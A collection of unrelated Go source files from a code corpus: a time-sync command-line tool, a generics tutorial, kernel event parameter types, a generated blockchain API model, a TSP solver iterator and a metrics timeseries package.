os.Exit(1)
return
}
var dateToSet *time.Time
for _, s := range *serversArg {
if s.Scheme == "" {
s.Scheme = "http"
}
logDebug("Querying `%s'", s.String())
req, err := http.NewRequest(http.MethodHead, s.String(), nil)
if err != nil {
logDebug("Unable to create request for `%s': %v", s.String(), err)
continue
}
res, err := http.DefaultClient.Do(req)
if err != nil {
logDebug("Unable to do request to `%s': %v", s.String(), err)
continue
}
date := res.Header.Get("Date")
if date == "" {
logDebug("`%s' has no date", s.String())
continue
}
t, err := time.Parse(time.RFC1123, date)
if err != nil {
logDebug("`%s' has invalid date (`%s') was not RFC1123", s.String(), date)
continue
}
logDebug("`%s' reports `%s'", s.String(), t.String())
dateToSet = &t
break
}
if dateToSet == nil {
logDebug("No time to set")
fmt.Fprintf(os.Stderr, "No server responded a valid time\n")
os.Exit(1)
return
}
logDebug("Setting time to %s", (*dateToSet).String())
if len(*commandToSetDate) > 0 {
for i := range *commandToSetDate {
(*commandToSetDate)[i] = timeutil.Strftime(dateToSet, (*commandToSetDate)[i])
}
logDebug("Running %v %d", *commandToSetDate, len(*commandToSetDate))
var args []string
if len(*commandToSetDate) > 1 {
args = (*commandToSetDate)[1:]
}
cmd := exec.Command((*commandToSetDate)[0], args...)
cmd.Stdin = os.Stdin
cmd.Stderr = os.Stderr
cmd.Stdout = os.Stdout
if err := cmd.Run(); err != nil {
fmt.Fprintf(os.Stderr, "Error on running `%s': %v", strings.Join(*commandToSetDate, " "), err)
os.Exit(1)
return
}
os.Exit(1)
return
}
if err := setTime(*dateToSet); err != nil {
panic(err)
}
} | main.go | 0.501221 | 0.403126 | main.go | starcoder |
package main
import "fmt"
type Number interface {
int64 | float64
}
type Custom interface {
Method()
}
type SomeType struct {
Field string
}
func (st SomeType) Method() {
fmt.Println(st.Field)
}
func main() {
// Initialize a map for the integer values
ints := map[string]int64{
"first": 34,
"second": 12,
}
// Initialize a map for the float values
floats := map[string]float64{
"first": 35.98,
"second": 26.99,
}
fmt.Printf("Non-Generic Sums: %v and %v\n",
SumInts(ints),
SumFloats(floats))
fmt.Printf("Generic Sums: %v and %v\n",
SumIntsOrFloats[string, int64](ints),
SumIntsOrFloats[string, float64](floats))
fmt.Printf("Generic Sums, type parameters inferred: %v and %v\n",
SumIntsOrFloats(ints),
SumIntsOrFloats(floats))
fmt.Printf("Generic Sums with Constraint: %v and %v\n",
SumNumbers(ints),
SumNumbers(floats))
fmt.Println()
st := SomeType{"this is a string"}
CheckCustomGenerics(st)
CheckCustomInterface(st)
fmt.Println()
fmt.Println(Invoke(int64(3), AsFloat))
// cannot use generic type ContainsSomething[T comparable] without instantiation
// fmt.Println(ContainsSomething{Something: "hello"})
fmt.Println()
fmt.Println(ContainsSomething[string]{Something: "hello"})
fmt.Println(ContainsSomething[int64]{Something: 789})
}
// SumInts adds together the values of m.
func SumInts(m map[string]int64) int64 {
var s int64
for _, v := range m {
s += v
}
return s
}
// SumFloats adds together the values of m.
func SumFloats(m map[string]float64) float64 {
var s float64
for _, v := range m {
s += v
}
return s
}
// SumIntsOrFloats sums the values of map m. It supports both floats and integers
// as map values.
func SumIntsOrFloats[K comparable, V int64 | float64](m map[K]V) V {
var s V
for _, v := range m {
s += v
}
return s
}
// SumNumbers sums the values of map m. Its supports both integers
// and floats as map values.
func SumNumbers[K comparable, V Number](m map[K]V) V {
var s V
for _, v := range m {
s += v
}
return s
}
// Just checking if custom interface can be used in generics
func CheckCustomGenerics[T Custom](t T) {
fmt.Println("Using generics")
t.Method()
}
func CheckCustomInterface(t Custom) {
fmt.Println("Using interface")
t.Method()
}
func Invoke[E Number, T Number](t T, f func(t T) E) E {
fmt.Println("Invoke is called.")
return f(t)
}
func AsFloat(i int64) float64 {
return float64(i)
}
type ContainsSomething[T comparable] struct {
Something T
} | go/interfaces/type_constraints/intro/main.go | 0.758511 | 0.427994 | main.go | starcoder |
package kparams
import (
"strconv"
)
const (
// NA defines absent parameter's value
NA = "na"
)
// Value defines the container for parameter values
type Value interface{}
// Type defines kernel event parameter type
type Type uint16
// Hex is the type alias for hexadecimal values
type Hex string
// NewHex creates a new Hex type from the given integer value.
func NewHex(v Value) Hex {
switch n := v.(type) {
case uint8:
return Hex(strconv.FormatUint(uint64(n), 16))
case uint16:
return Hex(strconv.FormatUint(uint64(n), 16))
case uint32:
return Hex(strconv.FormatUint(uint64(n), 16))
case uint64:
return Hex(strconv.FormatUint(uint64(n), 16))
case int32:
return Hex(strconv.FormatInt(int64(n), 16))
case int64:
return Hex(strconv.FormatInt(int64(n), 16))
default:
return ""
}
}
// Uint8 yields an uint8 value from its hex representation.
func (hex Hex) Uint8() uint8 { return uint8(hex.parseUint(8)) }
// Uint16 yields an uint16 value from its hex representation.
func (hex Hex) Uint16() uint16 { return uint16(hex.parseUint(16)) }
// Uint32 yields an uint32 value from its hex representation.
func (hex Hex) Uint32() uint32 { return uint32(hex.parseUint(32)) }
// Uint64 yields an uint64 value from its hex representation.
func (hex Hex) Uint64() uint64 { return hex.parseUint(64) }
func (hex Hex) parseUint(bitSize int) uint64 {
num, err := strconv.ParseUint(string(hex), 16, bitSize)
if err != nil {
return uint64(0)
}
return num
}
// String returns a string representation of the hex value.
func (hex Hex) String() string {
return string(hex)
}
const (
// Null is a null parameter type
Null Type = iota
// UnicodeString a string of 16-bit characters. By default, assumed to have been encoded using UTF-16LE
UnicodeString
// AnsiString a string of 8-bit characters
AnsiString
// Int8 a signed 8-bit integer
Int8
// Uint8 an unsigned 8-bit integer
Uint8
// Int16 a signed 16-bit integer
Int16
// Uint16 an unsigned 16-bit integer
Uint16
// Int32 a signed 32-bit integer
Int32
// Uint32 an unsigned 32-bit integer
Uint32
// Int64 a signed 64-bit integer
Int64
// Uint64 an unsigned 64-bit integer
Uint64
// Float an IEEE 4-byte floating-point number
Float
// Double an IEEE 8-byte floating-point number
Double
// Bool a 32-bit value where 0 is false and 1 is true
Bool
// Binary is a binary data of variable size. The size must be specified in the data definition as a constant or a reference to another (integer) data item.For an IP V6 address, the data should be an IN6_ADDR structure.
// For a socket address, the data should be a SOCKADDR_STORAGE structure. The AF_INET, AF_INET6, and AF_LINK address families are supported
Binary
// GUID is a GUID structure. On output, the GUID is rendered in the registry string form, {xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}
GUID
// Pointer an unsigned 32-bit or 64-bit pointer value. The size depends on the architecture of the computer logging the event
Pointer
// SID a security identifier (SID) structure that uniquely identifies a user or group
SID
// PID is the process identifier
PID
// TID is the thread identifier
TID
// WbemSID is the Web-Based Enterprise Management security identifier.
WbemSID
// HexInt8 is the hexadecimal representation of 8-bit integer
HexInt8
// HexInt16 is the hexadecimal representation of 16-bit integer
HexInt16
// HexInt32 is the hexadecimal representation of 32-bit integer
HexInt32
// HexInt64 is the hexadecimal representation of 64-bit integer
HexInt64
// Port represents the endpoint port number
Port
// IP is the IP address
IP
// IPv4 is the IPv4 address
IPv4
// IPv6 is the IPv6 address
IPv6
// Time represents the timestamp
Time
// Slice represents a collection of items
Slice
// Enum represents an enumeration
Enum
// Map represents a map
Map
// Object is the generic object
Object
// Unknown represent an unknown parameter type
Unknown
)
// String return the type string representation.
func (t Type) String() string {
switch t {
case UnicodeString:
return "unicode"
case AnsiString:
return "ansi"
case Int8:
return "int8"
case Uint8:
return "uint8"
case HexInt8:
return "hex8"
case Int16:
return "int16"
case Uint16:
return "uint16"
case HexInt16:
return "hex16"
case Int32:
return "int32"
case Uint32:
return "uint32"
case Int64:
return "int64"
case Uint64:
return "uint64"
case HexInt32:
return "hex32"
case HexInt64:
return "hex64"
case SID, WbemSID:
return "sid"
case TID:
return "tid"
case PID:
return "pid"
case Port:
return "port"
case IPv6:
return "ipv6"
case IPv4:
return "ipv4"
default:
return "unknown"
}
} | pkg/kevent/kparams/types.go | 0.744749 | 0.405861 | types.go | starcoder |
package cryptoapis
import (
"encoding/json"
)
// ListUnspentTransactionOutputsByAddressRI struct for ListUnspentTransactionOutputsByAddressRI
type ListUnspentTransactionOutputsByAddressRI struct {
// Represents the index position of the transaction in the block.
Index int32 `json:"index"`
// Represents the time at which a particular transaction can be added to the blockchain
Locktime int32 `json:"locktime"`
// Represents the hash of the block where this transaction was mined/confirmed for first time. The hash is defined as a cryptographic digital fingerprint made by hashing the block header twice through the SHA256 algorithm.
MinedInBlockHash string `json:"minedInBlockHash"`
// Represents the hight of the block where this transaction was mined/confirmed for first time. The height is defined as the number of blocks in the blockchain preceding this specific block.
MinedInBlockHeight int32 `json:"minedInBlockHeight"`
// Represents a list of recipient addresses with the respective amounts. In account-based protocols like Ethereum there is only one address in this list.
Recipients []GetTransactionDetailsByTransactionIDRIRecipients `json:"recipients"`
// Object Array representation of transaction senders
Senders []ListUnspentTransactionOutputsByAddressRISenders `json:"senders"`
// Represents the total size of this transaction
Size int32 `json:"size"`
// Defines the exact date/time in Unix Timestamp when this transaction was mined, confirmed or first seen in Mempool, if it is unconfirmed.
Timestamp int32 `json:"timestamp"`
// Represents the same as `transactionId` for account-based protocols like Ethereum, while it could be different in UTXO-based protocols like Bitcoin. E.g., in UTXO-based protocols `hash` is different from `transactionId` for SegWit transactions.
TransactionHash string `json:"transactionHash"`
// Represents the unique identifier of a transaction, i.e. it could be `transactionId` in UTXO-based protocols like Bitcoin, and transaction `hash` in Ethereum blockchain.
TransactionId string `json:"transactionId"`
// Represents the transaction version number.
Version int32 `json:"version"`
// Represents the transaction inputs.
Vin []ListUnspentTransactionOutputsByAddressRIVin `json:"vin"`
// Represents the transaction outputs.
Vout []ListConfirmedTransactionsByAddressRIBSBVout `json:"vout"`
Fee ListUnspentTransactionOutputsByAddressRIFee `json:"fee"`
BlockchainSpecific ListUnspentTransactionOutputsByAddressRIBlockchainSpecific `json:"blockchainSpecific"`
}
// NewListUnspentTransactionOutputsByAddressRI instantiates a new ListUnspentTransactionOutputsByAddressRI object
// This constructor will assign default values to properties that have it defined,
// and makes sure properties required by API are set, but the set of arguments
// will change when the set of required properties is changed
func NewListUnspentTransactionOutputsByAddressRI(index int32, locktime int32, minedInBlockHash string, minedInBlockHeight int32, recipients []GetTransactionDetailsByTransactionIDRIRecipients, senders []ListUnspentTransactionOutputsByAddressRISenders, size int32, timestamp int32, transactionHash string, transactionId string, version int32, vin []ListUnspentTransactionOutputsByAddressRIVin, vout []ListConfirmedTransactionsByAddressRIBSBVout, fee ListUnspentTransactionOutputsByAddressRIFee, blockchainSpecific ListUnspentTransactionOutputsByAddressRIBlockchainSpecific) *ListUnspentTransactionOutputsByAddressRI {
this := ListUnspentTransactionOutputsByAddressRI{}
this.Index = index
this.Locktime = locktime
this.MinedInBlockHash = minedInBlockHash
this.MinedInBlockHeight = minedInBlockHeight
this.Recipients = recipients
this.Senders = senders
this.Size = size
this.Timestamp = timestamp
this.TransactionHash = transactionHash
this.TransactionId = transactionId
this.Version = version
this.Vin = vin
this.Vout = vout
this.Fee = fee
this.BlockchainSpecific = blockchainSpecific
return &this
}
// NewListUnspentTransactionOutputsByAddressRIWithDefaults instantiates a new ListUnspentTransactionOutputsByAddressRI object
// This constructor will only assign default values to properties that have it defined,
// but it doesn't guarantee that properties required by API are set
func NewListUnspentTransactionOutputsByAddressRIWithDefaults() *ListUnspentTransactionOutputsByAddressRI {
this := ListUnspentTransactionOutputsByAddressRI{}
return &this
}
// GetIndex returns the Index field value
func (o *ListUnspentTransactionOutputsByAddressRI) GetIndex() int32 {
if o == nil {
var ret int32
return ret
}
return o.Index
}
// GetIndexOk returns a tuple with the Index field value
// and a boolean to check if the value has been set.
func (o *ListUnspentTransactionOutputsByAddressRI) GetIndexOk() (*int32, bool) {
if o == nil {
return nil, false
}
return &o.Index, true
}
// SetIndex sets field value
func (o *ListUnspentTransactionOutputsByAddressRI) SetIndex(v int32) {
o.Index = v
}
// GetLocktime returns the Locktime field value
func (o *ListUnspentTransactionOutputsByAddressRI) GetLocktime() int32 {
if o == nil {
var ret int32
return ret
}
return o.Locktime
}
// GetLocktimeOk returns a tuple with the Locktime field value
// and a boolean to check if the value has been set.
func (o *ListUnspentTransactionOutputsByAddressRI) GetLocktimeOk() (*int32, bool) {
if o == nil {
return nil, false
}
return &o.Locktime, true
}
// SetLocktime sets field value
func (o *ListUnspentTransactionOutputsByAddressRI) SetLocktime(v int32) {
o.Locktime = v
}
// GetMinedInBlockHash returns the MinedInBlockHash field value
func (o *ListUnspentTransactionOutputsByAddressRI) GetMinedInBlockHash() string {
if o == nil {
var ret string
return ret
}
return o.MinedInBlockHash
}
// GetMinedInBlockHashOk returns a tuple with the MinedInBlockHash field value
// and a boolean to check if the value has been set.
func (o *ListUnspentTransactionOutputsByAddressRI) GetMinedInBlockHashOk() (*string, bool) {
if o == nil {
return nil, false
}
return &o.MinedInBlockHash, true
}
// SetMinedInBlockHash sets field value
func (o *ListUnspentTransactionOutputsByAddressRI) SetMinedInBlockHash(v string) {
o.MinedInBlockHash = v
}
// GetMinedInBlockHeight returns the MinedInBlockHeight field value
func (o *ListUnspentTransactionOutputsByAddressRI) GetMinedInBlockHeight() int32 {
if o == nil {
var ret int32
return ret
}
return o.MinedInBlockHeight
}
// GetMinedInBlockHeightOk returns a tuple with the MinedInBlockHeight field value
// and a boolean to check if the value has been set.
func (o *ListUnspentTransactionOutputsByAddressRI) GetMinedInBlockHeightOk() (*int32, bool) {
if o == nil {
return nil, false
}
return &o.MinedInBlockHeight, true
}
// SetMinedInBlockHeight sets field value
func (o *ListUnspentTransactionOutputsByAddressRI) SetMinedInBlockHeight(v int32) {
o.MinedInBlockHeight = v
}
// GetRecipients returns the Recipients field value
func (o *ListUnspentTransactionOutputsByAddressRI) GetRecipients() []GetTransactionDetailsByTransactionIDRIRecipients {
if o == nil {
var ret []GetTransactionDetailsByTransactionIDRIRecipients
return ret
}
return o.Recipients
}
// GetRecipientsOk returns a tuple with the Recipients field value
// and a boolean to check if the value has been set.
func (o *ListUnspentTransactionOutputsByAddressRI) GetRecipientsOk() (*[]GetTransactionDetailsByTransactionIDRIRecipients, bool) {
if o == nil {
return nil, false
}
return &o.Recipients, true
}
// SetRecipients sets field value
func (o *ListUnspentTransactionOutputsByAddressRI) SetRecipients(v []GetTransactionDetailsByTransactionIDRIRecipients) {
o.Recipients = v
}
// GetSenders returns the Senders field value
func (o *ListUnspentTransactionOutputsByAddressRI) GetSenders() []ListUnspentTransactionOutputsByAddressRISenders {
if o == nil {
var ret []ListUnspentTransactionOutputsByAddressRISenders
return ret
}
return o.Senders
}
// GetSendersOk returns a tuple with the Senders field value
// and a boolean to check if the value has been set.
func (o *ListUnspentTransactionOutputsByAddressRI) GetSendersOk() (*[]ListUnspentTransactionOutputsByAddressRISenders, bool) {
if o == nil {
return nil, false
}
return &o.Senders, true
}
// SetSenders sets field value
func (o *ListUnspentTransactionOutputsByAddressRI) SetSenders(v []ListUnspentTransactionOutputsByAddressRISenders) {
o.Senders = v
}
// GetSize returns the Size field value
func (o *ListUnspentTransactionOutputsByAddressRI) GetSize() int32 {
if o == nil {
var ret int32
return ret
}
return o.Size
}
// GetSizeOk returns a tuple with the Size field value
// and a boolean to check if the value has been set.
func (o *ListUnspentTransactionOutputsByAddressRI) GetSizeOk() (*int32, bool) {
if o == nil {
return nil, false
}
return &o.Size, true
}
// SetSize sets field value
func (o *ListUnspentTransactionOutputsByAddressRI) SetSize(v int32) {
o.Size = v
}
// GetTimestamp returns the Timestamp field value
func (o *ListUnspentTransactionOutputsByAddressRI) GetTimestamp() int32 {
if o == nil {
var ret int32
return ret
}
return o.Timestamp
}
// GetTimestampOk returns a tuple with the Timestamp field value
// and a boolean to check if the value has been set.
func (o *ListUnspentTransactionOutputsByAddressRI) GetTimestampOk() (*int32, bool) {
if o == nil {
return nil, false
}
return &o.Timestamp, true
}
// SetTimestamp sets field value
func (o *ListUnspentTransactionOutputsByAddressRI) SetTimestamp(v int32) {
o.Timestamp = v
}
// GetTransactionHash returns the TransactionHash field value
func (o *ListUnspentTransactionOutputsByAddressRI) GetTransactionHash() string {
if o == nil {
var ret string
return ret
}
return o.TransactionHash
}
// GetTransactionHashOk returns a tuple with the TransactionHash field value
// and a boolean to check if the value has been set.
func (o *ListUnspentTransactionOutputsByAddressRI) GetTransactionHashOk() (*string, bool) {
if o == nil {
return nil, false
}
return &o.TransactionHash, true
}
// SetTransactionHash sets field value
func (o *ListUnspentTransactionOutputsByAddressRI) SetTransactionHash(v string) {
o.TransactionHash = v
}
// GetTransactionId returns the TransactionId field value
func (o *ListUnspentTransactionOutputsByAddressRI) GetTransactionId() string {
if o == nil {
var ret string
return ret
}
return o.TransactionId
}
// GetTransactionIdOk returns a tuple with the TransactionId field value
// and a boolean to check if the value has been set.
func (o *ListUnspentTransactionOutputsByAddressRI) GetTransactionIdOk() (*string, bool) {
if o == nil {
return nil, false
}
return &o.TransactionId, true
}
// SetTransactionId sets field value
func (o *ListUnspentTransactionOutputsByAddressRI) SetTransactionId(v string) {
o.TransactionId = v
}
// GetVersion returns the Version field value
func (o *ListUnspentTransactionOutputsByAddressRI) GetVersion() int32 {
if o == nil {
var ret int32
return ret
}
return o.Version
}
// GetVersionOk returns a tuple with the Version field value
// and a boolean to check if the value has been set.
func (o *ListUnspentTransactionOutputsByAddressRI) GetVersionOk() (*int32, bool) {
if o == nil {
return nil, false
}
return &o.Version, true
}
// SetVersion sets field value
func (o *ListUnspentTransactionOutputsByAddressRI) SetVersion(v int32) {
o.Version = v
}
// GetVin returns the Vin field value
func (o *ListUnspentTransactionOutputsByAddressRI) GetVin() []ListUnspentTransactionOutputsByAddressRIVin {
if o == nil {
var ret []ListUnspentTransactionOutputsByAddressRIVin
return ret
}
return o.Vin
}
// GetVinOk returns a tuple with the Vin field value
// and a boolean to check if the value has been set.
func (o *ListUnspentTransactionOutputsByAddressRI) GetVinOk() (*[]ListUnspentTransactionOutputsByAddressRIVin, bool) {
if o == nil {
return nil, false
}
return &o.Vin, true
}
// SetVin sets field value
func (o *ListUnspentTransactionOutputsByAddressRI) SetVin(v []ListUnspentTransactionOutputsByAddressRIVin) {
o.Vin = v
}
// GetVout returns the Vout field value
func (o *ListUnspentTransactionOutputsByAddressRI) GetVout() []ListConfirmedTransactionsByAddressRIBSBVout {
if o == nil {
var ret []ListConfirmedTransactionsByAddressRIBSBVout
return ret
}
return o.Vout
}
// GetVoutOk returns a tuple with the Vout field value
// and a boolean to check if the value has been set.
func (o *ListUnspentTransactionOutputsByAddressRI) GetVoutOk() (*[]ListConfirmedTransactionsByAddressRIBSBVout, bool) {
if o == nil {
return nil, false
}
return &o.Vout, true
}
// SetVout sets field value
func (o *ListUnspentTransactionOutputsByAddressRI) SetVout(v []ListConfirmedTransactionsByAddressRIBSBVout) {
o.Vout = v
}
// GetFee returns the Fee field value
func (o *ListUnspentTransactionOutputsByAddressRI) GetFee() ListUnspentTransactionOutputsByAddressRIFee {
if o == nil {
var ret ListUnspentTransactionOutputsByAddressRIFee
return ret
}
return o.Fee
}
// GetFeeOk returns a tuple with the Fee field value
// and a boolean to check if the value has been set.
func (o *ListUnspentTransactionOutputsByAddressRI) GetFeeOk() (*ListUnspentTransactionOutputsByAddressRIFee, bool) {
if o == nil {
return nil, false
}
return &o.Fee, true
}
// SetFee sets field value
func (o *ListUnspentTransactionOutputsByAddressRI) SetFee(v ListUnspentTransactionOutputsByAddressRIFee) {
o.Fee = v
}
// GetBlockchainSpecific returns the BlockchainSpecific field value
func (o *ListUnspentTransactionOutputsByAddressRI) GetBlockchainSpecific() ListUnspentTransactionOutputsByAddressRIBlockchainSpecific {
if o == nil {
var ret ListUnspentTransactionOutputsByAddressRIBlockchainSpecific
return ret
}
return o.BlockchainSpecific
}
// GetBlockchainSpecificOk returns a tuple with the BlockchainSpecific field value
// and a boolean to check if the value has been set.
func (o *ListUnspentTransactionOutputsByAddressRI) GetBlockchainSpecificOk() (*ListUnspentTransactionOutputsByAddressRIBlockchainSpecific, bool) {
if o == nil {
return nil, false
}
return &o.BlockchainSpecific, true
}
// SetBlockchainSpecific sets field value
func (o *ListUnspentTransactionOutputsByAddressRI) SetBlockchainSpecific(v ListUnspentTransactionOutputsByAddressRIBlockchainSpecific) {
o.BlockchainSpecific = v
}
func (o ListUnspentTransactionOutputsByAddressRI) MarshalJSON() ([]byte, error) {
toSerialize := map[string]interface{}{}
if true {
toSerialize["index"] = o.Index
}
if true {
toSerialize["locktime"] = o.Locktime
}
if true {
toSerialize["minedInBlockHash"] = o.MinedInBlockHash
}
if true {
toSerialize["minedInBlockHeight"] = o.MinedInBlockHeight
}
if true {
toSerialize["recipients"] = o.Recipients
}
if true {
toSerialize["senders"] = o.Senders
}
if true {
toSerialize["size"] = o.Size
}
if true {
toSerialize["timestamp"] = o.Timestamp
}
if true {
toSerialize["transactionHash"] = o.TransactionHash
}
if true {
toSerialize["transactionId"] = o.TransactionId
}
if true {
toSerialize["version"] = o.Version
}
if true {
toSerialize["vin"] = o.Vin
}
if true {
toSerialize["vout"] = o.Vout
}
if true {
toSerialize["fee"] = o.Fee
}
if true {
toSerialize["blockchainSpecific"] = o.BlockchainSpecific
}
return json.Marshal(toSerialize)
}
type NullableListUnspentTransactionOutputsByAddressRI struct {
value *ListUnspentTransactionOutputsByAddressRI
isSet bool
}
func (v NullableListUnspentTransactionOutputsByAddressRI) Get() *ListUnspentTransactionOutputsByAddressRI {
return v.value
}
func (v *NullableListUnspentTransactionOutputsByAddressRI) Set(val *ListUnspentTransactionOutputsByAddressRI) {
v.value = val
v.isSet = true
}
func (v NullableListUnspentTransactionOutputsByAddressRI) IsSet() bool {
return v.isSet
}
func (v *NullableListUnspentTransactionOutputsByAddressRI) Unset() {
v.value = nil
v.isSet = false
}
func NewNullableListUnspentTransactionOutputsByAddressRI(val *ListUnspentTransactionOutputsByAddressRI) *NullableListUnspentTransactionOutputsByAddressRI {
return &NullableListUnspentTransactionOutputsByAddressRI{value: val, isSet: true}
}
func (v NullableListUnspentTransactionOutputsByAddressRI) MarshalJSON() ([]byte, error) {
return json.Marshal(v.value)
}
func (v *NullableListUnspentTransactionOutputsByAddressRI) UnmarshalJSON(src []byte) error {
v.isSet = true
return json.Unmarshal(src, &v.value)
} | model_list_unspent_transaction_outputs_by_address_ri.go | 0.820397 | 0.442275 | model_list_unspent_transaction_outputs_by_address_ri.go | starcoder |
package iterator
import (
"fmt"
"github.com/Spi1y/tsp-solver/solver2/types"
)
// Iterator is a calculator used to determine the following values:
// - nodes left to visit (based on currently traveled path)
// - rows and columns used to calculate distance lower estimate (based on the path and the next node)
type Iterator struct {
// Size of the matrix, set in the Init()
size types.Index
// Mask slice of visited nodes, used to simplify path processing
nodesVisited []bool
// Last known node of the path
lastNode int16
// Calculated lists
nodesToVisit []types.Index
colsToIterate []types.Index
//rowsToIterate []types.Index
}
// Init is used to initialize internal structures according to the distance
// matrix size
func (it *Iterator) Init(size types.Index) {
it.size = size
it.nodesVisited = make([]bool, size)
it.nodesToVisit = make([]types.Index, size)
it.colsToIterate = make([]types.Index, size)
//it.rowsToIterate = make([]types.Index, size)
}
// SetPath process given path and calculates internal data structures
func (it *Iterator) SetPath(path []types.Index) error {
if it.size == 0 {
return fmt.Errorf("Iterator is not initialized")
}
if (len(path) == 0) || (path[0] != 0) {
return fmt.Errorf("Path must include 0 node as the first element")
}
if it.size < types.Index(len(path)) {
return fmt.Errorf("Incorrect path: length %v is greater than matrix size %v", len(path), it.size)
}
nodesCount := it.size - types.Index(len(path))
it.nodesToVisit = it.nodesToVisit[:nodesCount]
it.resetBuf()
for _, node := range path {
if node >= it.size {
return fmt.Errorf("Wrong node in the path: index %v is greater than matrix size %v", node, it.size)
}
it.nodesVisited[node] = true
}
if it.size == types.Index(len(path)) {
return nil
}
c := 0
for i := 0; types.Index(i) < it.size; i++ {
if it.nodesVisited[i] == false {
it.nodesToVisit[c] = types.Index(i)
c++
}
}
if len(path) == 0 {
it.lastNode = -1
} else {
it.lastNode = int16(path[len(path)-1])
}
return nil
}
// NodesToVisit retrieves the list of nodes left to visit
func (it *Iterator) NodesToVisit() []types.Index {
return it.nodesToVisit
}
// ColsToIterate is used to calculate the list of column indices which have to
// be processed to determine distance lower estimate, based on the path and the next node
func (it *Iterator) ColsToIterate(node types.Index) ([]types.Index, error) {
if node >= it.size {
return nil, fmt.Errorf("Incorrect next node index %v", node)
}
if len(it.nodesToVisit) == 0 {
if node != 0 {
return nil, fmt.Errorf("Incorrect next node index %v", node)
}
it.colsToIterate = it.colsToIterate[:0]
return it.colsToIterate, nil
}
if it.nodesVisited[node] == true {
return nil, fmt.Errorf("Node %v already visited", node)
}
var index types.Index
for i, val := range it.nodesToVisit {
if val == node {
index = types.Index(i)
break
}
}
// We do not decrement len because we need one additional element to hold 0 node
it.colsToIterate = it.colsToIterate[:len(it.nodesToVisit)]
it.colsToIterate[0] = 0
copy(it.colsToIterate[1:index+1], it.nodesToVisit[:index])
copy(it.colsToIterate[index+1:], it.nodesToVisit[index+1:])
return it.colsToIterate, nil
}
// RowsToIterate is used to calculate the list of row indices which have to
// be processed to determine distance lower estimate, based on the path and the next node
// It is equal to it.nodesToVisit
func (it *Iterator) RowsToIterate() []types.Index {
return it.nodesToVisit
}
// resetBuf resets values in the buffer to false using copy optimization
func (it *Iterator) resetBuf() {
if len(it.nodesVisited) == 0 {
return
}
it.nodesVisited[0] = false
for j := 1; types.Index(j) < it.size; j *= 2 {
copy(it.nodesVisited[j:], it.nodesVisited[:j])
}
} | solver3/iterator/iterator.go | 0.695235 | 0.659494 | iterator.go | starcoder |
package report
import (
"bytes"
"encoding/gob"
"encoding/json"
"math"
"time"
"github.com/mndrix/ps"
)
// Metrics is a string->metric map.
type Metrics map[string]Metric
// Merge merges two sets maps into a fresh set, performing set-union merges as
// appropriate.
func (m Metrics) Merge(other Metrics) Metrics {
result := m.Copy()
for k, v := range other {
result[k] = result[k].Merge(v)
}
return result
}
// Copy returns a value copy of the sets map.
func (m Metrics) Copy() Metrics {
result := Metrics{}
for k, v := range m {
result[k] = v
}
return result
}
// Metric is a list of timeseries data with some metadata. Clients must use the
// Add method to add values. Metrics are immutable.
type Metric struct {
Samples ps.List
Min, Max float64
First, Last time.Time
}
// Sample is a single datapoint of a metric.
type Sample struct {
Timestamp time.Time `json:"date"`
Value float64 `json:"value"`
}
var nilMetric = Metric{Samples: ps.NewList()}
// MakeMetric makes a new Metric.
func MakeMetric() Metric {
return nilMetric
}
// Copy returns a value copy of the Metric. Metric is immutable, so we can skip
// this.
func (m Metric) Copy() Metric {
return m
}
// WithFirst returns a fresh copy of m, with First set to t.
func (m Metric) WithFirst(t time.Time) Metric {
return Metric{
Samples: m.Samples,
Max: m.Max,
Min: m.Min,
First: t,
Last: m.Last,
}
}
// WithMax returns a fresh copy of m, with Max set to max
func (m Metric) WithMax(max float64) Metric {
return Metric{
Samples: m.Samples,
Max: max,
Min: m.Min,
First: m.First,
Last: m.Last,
}
}
// Len returns the number of samples in the metric.
func (m Metric) Len() int {
if m.Samples == nil {
return 0
}
return m.Samples.Size()
}
func first(t1, t2 time.Time) time.Time {
if t2.IsZero() || (!t1.IsZero() && t1.Before(t2)) {
return t1
}
return t2
}
func last(t1, t2 time.Time) time.Time {
if t2.IsZero() || (!t1.IsZero() && t1.After(t2)) {
return t1
}
return t2
}
// revCons appends acc to the head of curr, where acc is in reverse order.
// acc must never be nil, curr can be.
func revCons(acc, curr ps.List) ps.List {
if curr == nil {
return acc.Reverse()
}
for !acc.IsNil() {
acc, curr = acc.Tail(), curr.Cons(acc.Head())
}
return curr
}
// Add returns a new Metric with (t, v) added to its Samples. Add is the only
// valid way to grow a Metric.
func (m Metric) Add(t time.Time, v float64) Metric {
// Find the first element which is before you element, and insert
// your new element in the list. NB we want to dedupe entries with
// equal timestamps.
// This should be O(1) to insert a latest element, and O(n) in general.
curr, acc := m.Samples, ps.NewList()
for {
if curr == nil || curr.IsNil() {
acc = acc.Cons(Sample{t, v})
break
}
currSample := curr.Head().(Sample)
if currSample.Timestamp.Equal(t) {
acc, curr = acc.Cons(Sample{t, v}), curr.Tail()
break
}
if currSample.Timestamp.Before(t) {
acc = acc.Cons(Sample{t, v})
break
}
acc, curr = acc.Cons(curr.Head()), curr.Tail()
}
acc = revCons(acc, curr)
return Metric{
Samples: acc,
Max: math.Max(m.Max, v),
Min: math.Min(m.Min, v),
First: first(m.First, t),
Last: last(m.Last, t),
}
}
// Merge combines the two Metrics and returns a new result.
func (m Metric) Merge(other Metric) Metric {
// Merge two lists of samples in O(n)
curr1, curr2, acc := m.Samples, other.Samples, ps.NewList()
for {
if curr1 == nil || curr1.IsNil() {
acc = revCons(acc, curr2)
break
} else if curr2 == nil || curr2.IsNil() {
acc = revCons(acc, curr1)
break
}
s1 := curr1.Head().(Sample)
s2 := curr2.Head().(Sample)
if s1.Timestamp.Equal(s2.Timestamp) {
curr1, curr2, acc = curr1.Tail(), curr2.Tail(), acc.Cons(s1)
} else if s1.Timestamp.After(s2.Timestamp) {
curr1, acc = curr1.Tail(), acc.Cons(s1)
} else {
curr2, acc = curr2.Tail(), acc.Cons(s2)
}
}
return Metric{
Samples: acc,
Max: math.Max(m.Max, other.Max),
Min: math.Min(m.Min, other.Min),
First: first(m.First, other.First),
Last: last(m.Last, other.Last),
}
}
// Div returns a new copy of the metric, with each value divided by n.
func (m Metric) Div(n float64) Metric {
curr, acc := m.Samples, ps.NewList()
for curr != nil && !curr.IsNil() {
s := curr.Head().(Sample)
curr, acc = curr.Tail(), acc.Cons(Sample{s.Timestamp, s.Value / n})
}
acc = acc.Reverse()
return Metric{
Samples: acc,
Max: m.Max / n,
Min: m.Min / n,
First: m.First,
Last: m.Last,
}
}
// LastSample returns the last sample in the metric, or nil if there are no
// samples.
